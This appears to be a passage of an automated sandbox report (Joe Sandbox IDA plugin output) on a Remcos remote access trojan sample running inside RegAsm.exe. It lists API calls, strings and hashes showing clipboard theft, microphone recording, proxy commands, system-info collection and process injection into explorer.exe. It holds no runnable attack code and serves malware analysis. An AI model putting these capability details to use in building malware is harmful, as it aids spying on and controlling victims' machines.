                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
                                                          • __alloca_probe_16.LIBCMT ref: 00453EEA
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
                                                          • __alloca_probe_16.LIBCMT ref: 00453F94
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                                                            • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                                          • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
                                                          • __freea.LIBCMT ref: 00454003
                                                          • __freea.LIBCMT ref: 0045400F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                          • String ID: \@E
                                                          • API String ID: 201697637-1814623452
                                                          • Opcode ID: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
                                                          • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
                                                          • Opcode Fuzzy Hash: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
                                                          • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free
                                                          • String ID: \&G$\&G$`&G
                                                          • API String ID: 269201875-253610517
                                                          • Opcode ID: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
                                                          • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
                                                          • Opcode Fuzzy Hash: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
                                                          • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 65535$udp
                                                          • API String ID: 0-1267037602
                                                          • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                                          • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
                                                          • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
                                                          • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
                                                          • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
                                                          • __dosmaperr.LIBCMT ref: 0043A8A6
                                                          • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
                                                          • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
                                                          • __dosmaperr.LIBCMT ref: 0043A8E3
                                                          • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
                                                          • __dosmaperr.LIBCMT ref: 0043A937
                                                          • _free.LIBCMT ref: 0043A943
                                                          • _free.LIBCMT ref: 0043A94A
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                          • String ID:
                                                          • API String ID: 2441525078-0
                                                          • Opcode ID: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
                                                          • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
                                                          • Opcode Fuzzy Hash: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
                                                          • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
                                                          APIs
                                                          • SetEvent.KERNEL32(?,?), ref: 004054BF
                                                          • GetMessageA.USER32 ref: 0040556F
                                                          • TranslateMessage.USER32(?), ref: 0040557E
                                                          • DispatchMessageA.USER32 ref: 00405589
                                                          • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
                                                          • HeapFree.KERNEL32(00000000,00000000,0000003B), ref: 00405679
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                          • String ID: CloseChat$DisplayMessage$GetMessage
                                                          • API String ID: 2956720200-749203953
                                                          • Opcode ID: e8ddf5df02fce4b544027896364a672d6d10575023a457524935311215ed6370
                                                          • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
                                                          • Opcode Fuzzy Hash: e8ddf5df02fce4b544027896364a672d6d10575023a457524935311215ed6370
                                                          • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
                                                          APIs
                                                            • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
                                                          • CloseHandle.KERNEL32(00000000), ref: 00417DE5
                                                          • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
                                                          • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                          • String ID: 0VG$0VG$<$@$Temp
                                                          • API String ID: 1704390241-2575729100
                                                          • Opcode ID: f9dca7dd06046e6c411ba29df404d481f290ae67984b7d40cebbfb2df60e7368
                                                          • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
                                                          • Opcode Fuzzy Hash: f9dca7dd06046e6c411ba29df404d481f290ae67984b7d40cebbfb2df60e7368
                                                          • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
                                                          APIs
                                                          • OpenClipboard.USER32 ref: 00416941
                                                          • EmptyClipboard.USER32 ref: 0041694F
                                                          • CloseClipboard.USER32 ref: 00416955
                                                          • OpenClipboard.USER32 ref: 0041695C
                                                          • GetClipboardData.USER32 ref: 0041696C
                                                          • GlobalLock.KERNEL32 ref: 00416975
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
                                                          • CloseClipboard.USER32 ref: 00416984
                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                          • String ID: !D@
                                                          • API String ID: 2172192267-604454484
                                                          • Opcode ID: 22318caa46b03491db73261d90afa6b2702e1cfc59c73c6bb5b0d0ad4bd6099c
                                                          • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
                                                          • Opcode Fuzzy Hash: 22318caa46b03491db73261d90afa6b2702e1cfc59c73c6bb5b0d0ad4bd6099c
                                                          • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
                                                          APIs
                                                          • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
                                                          • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
                                                          • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
                                                          • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Service$CloseHandle$Open$ControlManager
                                                          • String ID:
                                                          • API String ID: 221034970-0
                                                          • Opcode ID: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                                          • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
                                                          • Opcode Fuzzy Hash: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
                                                          • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
                                                          APIs
                                                          • _free.LIBCMT ref: 100059EA
                                                            • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000), ref: 10005734
                                                            • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                          • _free.LIBCMT ref: 100059F6
                                                          • _free.LIBCMT ref: 10005A01
                                                          • _free.LIBCMT ref: 10005A0C
                                                          • _free.LIBCMT ref: 10005A17
                                                          • _free.LIBCMT ref: 10005A22
                                                          • _free.LIBCMT ref: 10005A2D
                                                          • _free.LIBCMT ref: 10005A38
                                                          • _free.LIBCMT ref: 10005A43
                                                          • _free.LIBCMT ref: 10005A51
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.882971818.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000008.00000002.882965468.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.882971818.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                          • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                          • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                          • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                          APIs
                                                          • _free.LIBCMT ref: 00448135
                                                            • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000), ref: 00446798
                                                            • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
                                                          • _free.LIBCMT ref: 00448141
                                                          • _free.LIBCMT ref: 0044814C
                                                          • _free.LIBCMT ref: 00448157
                                                          • _free.LIBCMT ref: 00448162
                                                          • _free.LIBCMT ref: 0044816D
                                                          • _free.LIBCMT ref: 00448178
                                                          • _free.LIBCMT ref: 00448183
                                                          • _free.LIBCMT ref: 0044818E
                                                          • _free.LIBCMT ref: 0044819C
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                          • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
                                                          • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
                                                          • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Eventinet_ntoa
                                                          • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                          • API String ID: 3578746661-3604713145
                                                          • Opcode ID: 37b6b078e45fc1cfe1273a2c191c7eff64cb689a02f1c40b552fbe6469b761a2
                                                          • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
                                                          • Opcode Fuzzy Hash: 37b6b078e45fc1cfe1273a2c191c7eff64cb689a02f1c40b552fbe6469b761a2
                                                          • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
                                                          APIs
                                                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DecodePointer
                                                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                          • API String ID: 3527080286-3064271455
                                                          • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                                          • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
                                                          • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
                                                          • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
                                                          APIs
                                                          • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004174F5
                                                            • Part of subcall function 0041C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C49E
                                                          • Sleep.KERNEL32(00000064), ref: 00417521
                                                          • DeleteFileW.KERNEL32(00000000), ref: 00417555
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: File$CreateDeleteExecuteShellSleep
                                                          • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                          • API String ID: 1462127192-2001430897
                                                          • Opcode ID: 914d150a256b78e7dab75b5e726e4ef897e440956d5b841ed856390941055c4b
                                                          • Instruction ID: 51d64fe7c8a5c54eac4555a52c350958ac4104e8f54c8767ba2a87230734c78e
                                                          • Opcode Fuzzy Hash: 914d150a256b78e7dab75b5e726e4ef897e440956d5b841ed856390941055c4b
                                                          • Instruction Fuzzy Hash: 1431307194011A9ADB04FB62DC96DED7779AF50309F40017EF606730E2EF785A8ACA9C
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(00472B14,00000000,004752D8,00003000,00000004,00000000,00000001), ref: 004073DD
                                                          • GetCurrentProcess.KERNEL32(00472B14,00000000,00008000,?,00000000,00000001,00000000,00407656,C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe), ref: 0040749E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CurrentProcess
                                                          • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                          • API String ID: 2050909247-4242073005
                                                          • Opcode ID: 105ebb0f8990cefe91757f1d0024cf73e91af1221990972c55416f3ee457c51f
                                                          • Instruction ID: f630994b7aed3d2c1b9b8fa2b3e4f68b22e8b08ead4833dea6669ff7d567ef23
                                                          • Opcode Fuzzy Hash: 105ebb0f8990cefe91757f1d0024cf73e91af1221990972c55416f3ee457c51f
                                                          • Instruction Fuzzy Hash: 7031A471A04700ABD321FF65ED46F167BB8AB44305F10087EF515A6292E7B8B8448B6F
                                                          APIs
                                                          • _strftime.LIBCMT ref: 00401D50
                                                            • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                                          • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401E02
                                                          • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                                          • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                          • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                          • API String ID: 3809562944-243156785
                                                          • Opcode ID: ad8ba90a2921d66a3c12ccf8c1a2d8e4c0e0e91c69b7ff21a65ebece821e0ee7
                                                          • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                                                          • Opcode Fuzzy Hash: ad8ba90a2921d66a3c12ccf8c1a2d8e4c0e0e91c69b7ff21a65ebece821e0ee7
                                                          • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                                                          APIs
                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00410E6E
                                                          • int.LIBCPMT ref: 00410E81
                                                            • Part of subcall function 0040E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 0040E0D2
                                                            • Part of subcall function 0040E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E0EC
                                                          • std::_Facet_Register.LIBCPMT ref: 00410EC1
                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00410ECA
                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00410EE8
                                                          • __Init_thread_footer.LIBCMT ref: 00410F29
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                          • String ID: ,kG$0kG
                                                          • API String ID: 3815856325-2015055088
                                                          • Opcode ID: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                                                          • Instruction ID: 12cf7b7900226bd12227407fb3b1cbab205c4dd0745ae636880afd2a72082c2f
                                                          • Opcode Fuzzy Hash: e0f3714a3daeaf8b288ae2a542907f179217b7f89c568a0a8b7367a1e9159da3
                                                          • Instruction Fuzzy Hash: 162134329005249BC704EB6AD9428DE37A8EF48324F20056FF804A72D1DBB9AD81CB9D
                                                          APIs
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                                          • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000), ref: 00401C8F
                                                          • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                                          • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                                          • waveInStart.WINMM ref: 00401CFE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                          • String ID: dMG$|MG$PG
                                                          • API String ID: 1356121797-532278878
                                                          • Opcode ID: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                                                          • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                                          • Opcode Fuzzy Hash: f67d326050ea03177529252cfca037bf538e61c655dad41bf55bf31ac8308c8f
                                                          • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                                          APIs
                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                                            • Part of subcall function 0041D50F: RegisterClassExA.USER32 ref: 0041D55B
                                                            • Part of subcall function 0041D50F: CreateWindowExA.USER32 ref: 0041D576
                                                            • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                                          • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                                          • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                                          • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                                          • TranslateMessage.USER32(?), ref: 0041D4E9
                                                          • DispatchMessageA.USER32 ref: 0041D4F3
                                                          • GetMessageA.USER32 ref: 0041D500
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000008.00000002.881763097.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000008.00000002.881763097.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000008.00000002.881763097.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_8_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                          • String ID: Remcos
                                                          • API String ID: 1970332568-165870891
                                                          • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                                          • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
